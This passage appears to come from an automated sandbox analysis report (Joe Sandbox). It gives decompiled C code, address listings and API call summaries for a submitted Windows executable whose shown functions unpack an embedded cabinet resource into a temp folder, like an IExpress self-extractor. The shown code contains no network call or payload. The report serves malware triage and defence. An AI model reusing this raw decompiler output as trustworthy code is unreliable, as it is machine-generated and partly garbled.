							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x59a38; // 0x0
							_t110 =  *((intOrPtr*)(0x589e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x589e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x59a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E000544B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x59124 = E00056285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E000544B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x59124 = E00056285();
					_t66 = 0;
					L33:
					return E00056CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}



































                                                                                                                                                                                                                                                0x0005597d
                                                                                                                                                                                                                                                0x00055988
                                                                                                                                                                                                                                                0x0005598f
                                                                                                                                                                                                                                                0x0005599a
                                                                                                                                                                                                                                                0x000559a6
                                                                                                                                                                                                                                                0x000559a8
                                                                                                                                                                                                                                                0x000559af
                                                                                                                                                                                                                                                0x000559b9
                                                                                                                                                                                                                                                0x000559dd
                                                                                                                                                                                                                                                0x000559e4
                                                                                                                                                                                                                                                0x000559f1
                                                                                                                                                                                                                                                0x000559fe
                                                                                                                                                                                                                                                0x00055a0b
                                                                                                                                                                                                                                                0x00055a13
                                                                                                                                                                                                                                                0x00055a19
                                                                                                                                                                                                                                                0x00055a1b
                                                                                                                                                                                                                                                0x00055ba1
                                                                                                                                                                                                                                                0x00055baf
                                                                                                                                                                                                                                                0x00055bbd
                                                                                                                                                                                                                                                0x00055bd8
                                                                                                                                                                                                                                                0x00055bde
                                                                                                                                                                                                                                                0x00055be3
                                                                                                                                                                                                                                                0x00055bec
                                                                                                                                                                                                                                                0x00055bf0
                                                                                                                                                                                                                                                0x00055bfc
                                                                                                                                                                                                                                                0x00055c02
                                                                                                                                                                                                                                                0x00055c02
                                                                                                                                                                                                                                                0x00055c02
                                                                                                                                                                                                                                                0x00055c04
                                                                                                                                                                                                                                                0x00055c04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055c04
                                                                                                                                                                                                                                                0x00055a27
                                                                                                                                                                                                                                                0x00055a3a
                                                                                                                                                                                                                                                0x00055a46
                                                                                                                                                                                                                                                0x00055a48
                                                                                                                                                                                                                                                0x00055a4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055a64
                                                                                                                                                                                                                                                0x00055a6a
                                                                                                                                                                                                                                                0x00055a6c
                                                                                                                                                                                                                                                0x00055abc
                                                                                                                                                                                                                                                0x00055ac2
                                                                                                                                                                                                                                                0x00055ac9
                                                                                                                                                                                                                                                0x00055aca
                                                                                                                                                                                                                                                0x00055aca
                                                                                                                                                                                                                                                0x00055acc
                                                                                                                                                                                                                                                0x00055acc
                                                                                                                                                                                                                                                0x00055acf
                                                                                                                                                                                                                                                0x00055ad1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ad3
                                                                                                                                                                                                                                                0x00055ad6
                                                                                                                                                                                                                                                0x00055ad8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ada
                                                                                                                                                                                                                                                0x00055adc
                                                                                                                                                                                                                                                0x00055add
                                                                                                                                                                                                                                                0x00055add
                                                                                                                                                                                                                                                0x00055ae0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055ae0
                                                                                                                                                                                                                                                0x00055ae2
                                                                                                                                                                                                                                                0x00055ae4
                                                                                                                                                                                                                                                0x00055ae6
                                                                                                                                                                                                                                                0x00055ae6
                                                                                                                                                                                                                                                0x00055ae6
                                                                                                                                                                                                                                                0x00055ae9
                                                                                                                                                                                                                                                0x00055aeb
                                                                                                                                                                                                                                                0x00055af0
                                                                                                                                                                                                                                                0x00055af6
                                                                                                                                                                                                                                                0x00055af8
                                                                                                                                                                                                                                                0x00055af9
                                                                                                                                                                                                                                                0x00055af9
                                                                                                                                                                                                                                                0x00055afb
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055afd
                                                                                                                                                                                                                                                0x00055aff
                                                                                                                                                                                                                                                0x00055b00
                                                                                                                                                                                                                                                0x00055b03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b03
                                                                                                                                                                                                                                                0x00055b05
                                                                                                                                                                                                                                                0x00055b08
                                                                                                                                                                                                                                                0x00055b20
                                                                                                                                                                                                                                                0x00055b27
                                                                                                                                                                                                                                                0x00055b52
                                                                                                                                                                                                                                                0x00055b52
                                                                                                                                                                                                                                                0x00055b5b
                                                                                                                                                                                                                                                0x00055b62
                                                                                                                                                                                                                                                0x00055b6b
                                                                                                                                                                                                                                                0x00055b6d
                                                                                                                                                                                                                                                0x00055b76
                                                                                                                                                                                                                                                0x00055b7d
                                                                                                                                                                                                                                                0x00055b83
                                                                                                                                                                                                                                                0x00055b7f
                                                                                                                                                                                                                                                0x00055b7f
                                                                                                                                                                                                                                                0x00055b7f
                                                                                                                                                                                                                                                0x00055b6f
                                                                                                                                                                                                                                                0x00055b72
                                                                                                                                                                                                                                                0x00055b72
                                                                                                                                                                                                                                                0x00055b85
                                                                                                                                                                                                                                                0x00055b98
                                                                                                                                                                                                                                                0x00055b9e
                                                                                                                                                                                                                                                0x00055b87
                                                                                                                                                                                                                                                0x00055b8f
                                                                                                                                                                                                                                                0x00055b8f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b85
                                                                                                                                                                                                                                                0x00055b29
                                                                                                                                                                                                                                                0x00055b33
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b35
                                                                                                                                                                                                                                                0x00055b48
                                                                                                                                                                                                                                                0x00055b4a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b4a
                                                                                                                                                                                                                                                0x00055b0f
                                                                                                                                                                                                                                                0x00055b16
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055b16
                                                                                                                                                                                                                                                0x00055a7c
                                                                                                                                                                                                                                                0x00055a8a
                                                                                                                                                                                                                                                0x00055aa5
                                                                                                                                                                                                                                                0x00055aab
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000559bb
                                                                                                                                                                                                                                                0x000559c0
                                                                                                                                                                                                                                                0x000559c7
                                                                                                                                                                                                                                                0x000559d1
                                                                                                                                                                                                                                                0x000559d6
                                                                                                                                                                                                                                                0x00055c05
                                                                                                                                                                                                                                                0x00055c14
                                                                                                                                                                                                                                                0x00055c14

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000559A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 000559AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00055A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00055A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00055A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00055A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00055A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00055AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00055BFC
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: 2b0a953101ce7a492a8053491796b44776efc8abc5c032eb273867d76a5e7205
                                                                                                                                                                                                                                                • Instruction ID: 0539d0c6b227e948f4ce7ec982173aa7ffe253239ed7430ec85f44bc647426f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b0a953101ce7a492a8053491796b44776efc8abc5c032eb273867d76a5e7205
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D71A7B1A0071C9FFB65DB60CC99BFB77ACEB48303F4445A9F80592181DB349E888B65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00054FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 374 54fe0-5501a call 5468f FindResourceA LoadResource LockResource 377 55161-55163 374->377 378 55020-55027 374->378 379 55057-5505e call 54efd 378->379 380 55029-55051 GetDlgItem ShowWindow GetDlgItem ShowWindow 378->380 383 55060-55077 call 544b9 379->383 384 5507c-550b4 379->384 380->379 388 55107-5510e 383->388 389 550b6-550da 384->389 390 550e8-55104 call 544b9 384->390 392 55110-55117 FreeResource 388->392 393 5511d-5511f 388->393 398 55106 389->398 399 550dc 389->399 390->398 392->393 396 55121-55127 393->396 397 5513a-55141 393->397 396->397 400 55129-55135 call 544b9 396->400 401 55143-5514a 397->401 402 5515f 397->402 398->388 405 550e3-550e6 399->405 400->397 401->402 403 5514c-55159 SendMessageA 401->403 402->377 403->402 405->390 405->398
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00054FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x59144 = E0005468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x59140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x58584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x58584, 0x841), 5);
				}
				_t10 = E00054EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00054CA0, E00054CC0, E00054980, E00054A50, E00054AD0, E00054B60, E00054BC0, 1, 0x59148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x59148; // 0x0
						_t24 =  *0x58584; // 0x0
						E000544B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x51140, 0, E00054CD0, 0, 0x59140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x58584; // 0x0
					E000544B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x59140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x59140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x591d8; // 0x0
						if(_t47 == 0) {
							E000544B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x58a38 & 0x00000001) == 0 && ( *0x59a34 & 0x00000001) == 0) {
						SendMessageA( *0x58584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}
















                                                                                                                                                                                                                                                0x00054fe0
                                                                                                                                                                                                                                                0x00054fe6
                                                                                                                                                                                                                                                0x00054ff9
                                                                                                                                                                                                                                                0x0005500d
                                                                                                                                                                                                                                                0x00055013
                                                                                                                                                                                                                                                0x0005501a
                                                                                                                                                                                                                                                0x00055163
                                                                                                                                                                                                                                                0x00055163
                                                                                                                                                                                                                                                0x00055020
                                                                                                                                                                                                                                                0x00055027
                                                                                                                                                                                                                                                0x00055037
                                                                                                                                                                                                                                                0x00055051
                                                                                                                                                                                                                                                0x00055051
                                                                                                                                                                                                                                                0x00055057
                                                                                                                                                                                                                                                0x0005505e
                                                                                                                                                                                                                                                0x000550a7
                                                                                                                                                                                                                                                0x000550ad
                                                                                                                                                                                                                                                0x000550b4
                                                                                                                                                                                                                                                0x000550e8
                                                                                                                                                                                                                                                0x000550e8
                                                                                                                                                                                                                                                0x000550ee
                                                                                                                                                                                                                                                0x000550ff
                                                                                                                                                                                                                                                0x00055104
                                                                                                                                                                                                                                                0x00055106
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055106
                                                                                                                                                                                                                                                0x000550cd
                                                                                                                                                                                                                                                0x000550d3
                                                                                                                                                                                                                                                0x000550da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000550dd
                                                                                                                                                                                                                                                0x000550e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055060
                                                                                                                                                                                                                                                0x00055060
                                                                                                                                                                                                                                                0x00055070
                                                                                                                                                                                                                                                0x00055075
                                                                                                                                                                                                                                                0x00055107
                                                                                                                                                                                                                                                0x00055107
                                                                                                                                                                                                                                                0x0005510e
                                                                                                                                                                                                                                                0x00055111
                                                                                                                                                                                                                                                0x00055117
                                                                                                                                                                                                                                                0x00055117
                                                                                                                                                                                                                                                0x0005511f
                                                                                                                                                                                                                                                0x00055121
                                                                                                                                                                                                                                                0x00055127
                                                                                                                                                                                                                                                0x00055135
                                                                                                                                                                                                                                                0x00055135
                                                                                                                                                                                                                                                0x00055127
                                                                                                                                                                                                                                                0x00055141
                                                                                                                                                                                                                                                0x00055159
                                                                                                                                                                                                                                                0x00055159
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005515f

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00054FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00055006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0005500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 00055030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00055037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 0005504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00055051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00055111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00055159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: 9b190de344fab2f7742538691da3a9819656746d34597b7e9790c12f2d173372
                                                                                                                                                                                                                                                • Instruction ID: 02efa0e99c40939cbfadde2056a31f69ce3bd18cde6c121bc28d8968e8514ffd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b190de344fab2f7742538691da3a9819656746d34597b7e9790c12f2d173372
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F310770740F11BBFB605B61AC9EFA73A9CA74574BF044114BE05A61E1DBBC8C888B69
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00052F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 450 52f1d-52f3d 451 52f6c-52f73 call 55164 450->451 452 52f3f-52f46 450->452 461 53041 451->461 462 52f79-52f80 call 555a0 451->462 453 52f5f-52f66 call 53a3f 452->453 454 52f48 call 551e5 452->454 453->451 453->461 459 52f4d-52f4f 454->459 459->461 464 52f55-52f5d 459->464 463 53043-53053 call 56ce0 461->463 462->461 469 52f86-52fbe GetSystemDirectoryA call 5658a LoadLibraryA 462->469 464->451 464->453 472 52ff7-53004 FreeLibrary 469->472 473 52fc0-52fd4 GetProcAddress 469->473 475 53017-53024 SetCurrentDirectoryA 472->475 476 53006-5300c 472->476 473->472 474 52fd6-52fee DecryptFileA 473->474 474->472 485 52ff0-52ff5 474->485 478 53054-5305a 475->478 479 53026-5303c call 544b9 call 56285 475->479 476->475 477 5300e call 5621e 476->477 489 53013-53015 477->489 481 53065-5306c 478->481 482 5305c call 53b26 478->482 479->461 487 5307c-53089 481->487 488 5306e-53075 call 5256d 481->488 492 53061-53063 482->492 485->472 494 530a1-530a9 487->494 495 5308b-53091 487->495 500 5307a 488->500 489->461 489->475 492->461 492->481 498 530b4-530b7 494->498 499 530ab-530ad 494->499 495->494 496 53093 call 53ba2 495->496 503 53098-5309a 496->503 498->463 499->498 502 530af call 54169 499->502 500->487 502->498 503->461 505 5309c 503->505 505->494
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E00052F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x58004; // 0x5a679bd9
				_v8 = _t9 ^ _t46;
				if( *0x58a38 != 0) {
					L5:
					_t11 = E00055164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00056CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E000555A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0005658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x5a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x58a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x58a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x58d48 & 0x000000c0;
									if(( *0x58d48 & 0x000000c0) == 0) {
										_t41 =  *0x59a40; // 0x3, executed
										_t26 = E0005256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x58a24; // 0x0
									 *0x59a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x58a38;
										if( *0x58a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00054169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x59a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00053BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x58a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00053B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E000544B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x59124 = E00056285();
							goto L16;
						}
						_t59 =  *0x59a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0005621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x58a24;
				if( *0x58a24 != 0) {
					L4:
					_t34 = E00053A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E000551E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x58a38;
				if( *0x58a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                                0x00052f1d
                                                                                                                                                                                                                                                0x00052f28
                                                                                                                                                                                                                                                0x00052f2f
                                                                                                                                                                                                                                                0x00052f3d
                                                                                                                                                                                                                                                0x00052f6c
                                                                                                                                                                                                                                                0x00052f6c
                                                                                                                                                                                                                                                0x00052f71
                                                                                                                                                                                                                                                0x00052f73
                                                                                                                                                                                                                                                0x00053041
                                                                                                                                                                                                                                                0x00053041
                                                                                                                                                                                                                                                0x00053043
                                                                                                                                                                                                                                                0x00053053
                                                                                                                                                                                                                                                0x00053053
                                                                                                                                                                                                                                                0x00052f79
                                                                                                                                                                                                                                                0x00052f80
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052f86
                                                                                                                                                                                                                                                0x00052f86
                                                                                                                                                                                                                                                0x00052f93
                                                                                                                                                                                                                                                0x00052f9e
                                                                                                                                                                                                                                                0x00052fa0
                                                                                                                                                                                                                                                0x00052fa6
                                                                                                                                                                                                                                                0x00052fb8
                                                                                                                                                                                                                                                0x00052fba
                                                                                                                                                                                                                                                0x00052fbe
                                                                                                                                                                                                                                                0x00052fc6
                                                                                                                                                                                                                                                0x00052fcc
                                                                                                                                                                                                                                                0x00052fd4
                                                                                                                                                                                                                                                0x00052fd6
                                                                                                                                                                                                                                                0x00052fd8
                                                                                                                                                                                                                                                0x00052fe0
                                                                                                                                                                                                                                                0x00052fe6
                                                                                                                                                                                                                                                0x00052fee
                                                                                                                                                                                                                                                0x00052ff0
                                                                                                                                                                                                                                                0x00052ff5
                                                                                                                                                                                                                                                0x00052ff5
                                                                                                                                                                                                                                                0x00052fee
                                                                                                                                                                                                                                                0x00052fd4
                                                                                                                                                                                                                                                0x00052ff8
                                                                                                                                                                                                                                                0x00052ffe
                                                                                                                                                                                                                                                0x00053004
                                                                                                                                                                                                                                                0x00053017
                                                                                                                                                                                                                                                0x0005301c
                                                                                                                                                                                                                                                0x00053024
                                                                                                                                                                                                                                                0x00053054
                                                                                                                                                                                                                                                0x0005305a
                                                                                                                                                                                                                                                0x00053065
                                                                                                                                                                                                                                                0x00053065
                                                                                                                                                                                                                                                0x0005306c
                                                                                                                                                                                                                                                0x0005306e
                                                                                                                                                                                                                                                0x00053075
                                                                                                                                                                                                                                                0x0005307a
                                                                                                                                                                                                                                                0x0005307a
                                                                                                                                                                                                                                                0x0005307c
                                                                                                                                                                                                                                                0x00053081
                                                                                                                                                                                                                                                0x00053087
                                                                                                                                                                                                                                                0x00053089
                                                                                                                                                                                                                                                0x000530a1
                                                                                                                                                                                                                                                0x000530a1
                                                                                                                                                                                                                                                0x000530a9
                                                                                                                                                                                                                                                0x000530ab
                                                                                                                                                                                                                                                0x000530ad
                                                                                                                                                                                                                                                0x000530af
                                                                                                                                                                                                                                                0x000530af
                                                                                                                                                                                                                                                0x000530ad
                                                                                                                                                                                                                                                0x000530b6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005308b
                                                                                                                                                                                                                                                0x0005308b
                                                                                                                                                                                                                                                0x00053091
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053093
                                                                                                                                                                                                                                                0x00053098
                                                                                                                                                                                                                                                0x0005309a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005309c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005309c
                                                                                                                                                                                                                                                0x00053089
                                                                                                                                                                                                                                                0x0005305c
                                                                                                                                                                                                                                                0x00053061
                                                                                                                                                                                                                                                0x00053063
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053063
                                                                                                                                                                                                                                                0x0005302b
                                                                                                                                                                                                                                                0x00053032
                                                                                                                                                                                                                                                0x0005303c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005303c
                                                                                                                                                                                                                                                0x00053006
                                                                                                                                                                                                                                                0x0005300c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005300e
                                                                                                                                                                                                                                                0x00053015
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00053015
                                                                                                                                                                                                                                                0x00052f80
                                                                                                                                                                                                                                                0x00052f3f
                                                                                                                                                                                                                                                0x00052f46
                                                                                                                                                                                                                                                0x00052f5f
